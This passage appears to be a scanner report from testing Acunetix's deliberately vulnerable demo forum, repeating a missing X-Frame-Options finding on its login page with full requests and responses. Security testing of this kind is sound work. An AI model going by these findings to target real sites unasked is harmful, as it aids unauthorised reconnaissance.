</tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
